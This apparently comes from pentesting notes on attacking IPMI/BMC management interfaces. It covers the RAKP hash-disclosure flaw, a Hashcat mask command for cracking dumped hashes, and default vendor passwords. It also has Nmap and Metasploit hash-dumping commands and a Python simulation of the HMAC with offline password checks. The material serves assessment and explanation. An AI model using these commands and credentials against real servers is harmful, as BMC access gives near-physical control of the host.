IPMI

Intelligent Platform Management Interface (IPMI) is a set of standardized specifications for hardware-based host management systems used for system management and monitoring. It runs as an autonomous subsystem, independent of the host's BIOS, CPU, firmware, and operating system, so sysadmins can manage and monitor systems even when they are powered off or unresponsive. It operates over a direct network connection to the system's hardware and does not require a login shell on the operating system. IPMI communicates over UDP port 623. The embedded controller that implements IPMI on a system is the Baseboard Management Controller (BMC). If we can access a BMC during an assessment, we gain full access to the host motherboard and can monitor, reboot, power off, or even reinstall the host operating system. Gaining access to a BMC is nearly equivalent to physical access to the system.

IPMI is typically used in three ways:

  • Before the OS has booted to modify BIOS settings

  • When the host is fully powered down

  • Access to a host after a system failure

When not being used for these tasks, IPMI can monitor a range of different things such as system temperature, voltage, fan status, and power supplies. To function, IPMI requires the following components:

  1. Baseboard Management Controller (BMC) - A micro-controller and essential component of an IPMI

  2. Intelligent Chassis Management Bus (ICMB) - An interface that permits communication from one chassis to another

  3. Intelligent Platform Management Bus (IPMB) - extends the BMC

  4. IPMI Memory - stores things such as the system event log, repository store data, and more

  5. Communications Interfaces - local system interfaces, serial and LAN interfaces, ICMB and PCI Management Bus

IPMI 2.0 RAKP flaw

During the authentication process, the BMC sends a salted SHA1 or MD5 hash keyed with the user's password to the client before the client has authenticated. This can be leveraged to obtain the password hash for ANY valid user account on the BMC. These hashes can then be cracked offline with a dictionary attack using Hashcat mode 7300. In the event of an HP iLO using a factory default password, we can use the Hashcat mask attack command "hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u", which tries all combinations of upper-case letters and digits for an eight-character password.
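To make the flaw concrete, the following is an added example (not code from the original page) that simulates what a BMC returns in RAKP Message 2. Every field the BMC authenticates over (session IDs, both random numbers, the GUID, privilege level and username) travels in the clear in RAKP messages 1 and 2; the only secret that enters the HMAC is the user's password. All field values below are constructed, and the field layout follows the IPMI 2.0 RAKP Message 2 definition for the RAKP-HMAC-SHA1 cipher suites; the helper names are ours.

```python
import hmac
import hashlib
import struct

# Constructed RAKP Message 1/2 fields (example values, not captured from a real BMC).
# Multi-byte integers are laid out little-endian, as they appear on the wire.
SID_CONSOLE = 0xA4A3A2A0          # remote console session ID (4 bytes)
SID_BMC = 0x02000000              # managed system session ID (4 bytes)
RAND_CONSOLE = bytes(range(16))   # remote console random number (16 bytes)
RAND_BMC = bytes(range(16, 32))   # managed system random number (16 bytes)
GUID_BMC = bytes(16)              # managed system GUID (16 bytes)
PRIV_LEVEL = 0x14                 # requested max privilege: ADMINISTRATOR with name-only lookup bit
USERNAME = "root"


def rakp2_salt(sid_console, sid_bmc, rand_console, rand_bmc, guid_bmc, priv_level, username):
    """Concatenate the RAKP Message 2 fields the BMC computes its HMAC over.

    All of these values are exchanged unauthenticated, so the client (or a
    passive observer) holds everything except the password.
    """
    uname = username.encode()
    return (
        struct.pack("<I", sid_console)
        + struct.pack("<I", sid_bmc)
        + rand_console
        + rand_bmc
        + guid_bmc
        + bytes([priv_level, len(uname)])
        + uname
    )


def rakp2_auth_code(password, salt):
    """Key Exchange Authentication Code returned in RAKP Message 2:
    HMAC-SHA1 keyed with the user's password."""
    return hmac.new(password.encode(), salt, hashlib.sha1).digest()


def hashcat_7300_line(salt, auth_code):
    """Render the pair in the salt:hmac hex form that Hashcat mode 7300 consumes."""
    return f"{salt.hex()}:{auth_code.hex()}"


def password_verifies(candidate, salt, auth_code):
    """Offline check of a candidate password against a received auth code.
    No further contact with the BMC is needed, so BMC-side lockout or rate
    limiting does not help; only the password's entropy does."""
    return hmac.compare_digest(rakp2_auth_code(candidate, salt), auth_code)


def demo(password="calvin"):
    """Simulate a BMC whose `root` user has `password` set and return
    the salt and auth code the client receives in RAKP Message 2."""
    salt = rakp2_salt(SID_CONSOLE, SID_BMC, RAND_CONSOLE, RAND_BMC, GUID_BMC, PRIV_LEVEL, USERNAME)
    return salt, rakp2_auth_code(password, salt)


if __name__ == "__main__":
    salt, code = demo()
    print("hashcat -m 7300 input:", hashcat_7300_line(salt, code))
    for guess in ["ADMIN", "password", "calvin"]:
        print(f"{guess!r:>12}: {'match' if password_verifies(guess, salt, code) else 'no match'}")
```

Because the auth code is verifiable offline, the defence is entirely in the password and the network: the eight-character upper-case-and-digit mask above covers 36^8 (about 2.8 trillion) candidates, which is why vendor-randomized defaults of that shape are still replaced with long unique passwords, and why UDP 623 belongs on an isolated management network rather than anywhere an unauthenticated client can open an RMCP+ session.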

Default Credentials

Product           Username        Password
Dell iDRAC        root            calvin
HP iLO            Administrator   randomized 8-character string consisting of numbers and uppercase letters
Supermicro IPMI   ADMIN           ADMIN

Tips2Hack

  1. Nmap

sudo nmap -sU --script ipmi-version -p 623 ilo.kekmaster.local

  2. Metasploit Version Scan

msf6 > use auxiliary/scanner/ipmi/ipmi_version
msf6 > set rhosts 13.13.13.13
msf6 > run

  3. Metasploit Dumping Hashes

msf6 > use auxiliary/scanner/ipmi/ipmi_dumphashes
msf6 > set rhosts 13.13.13.13
msf6 > run
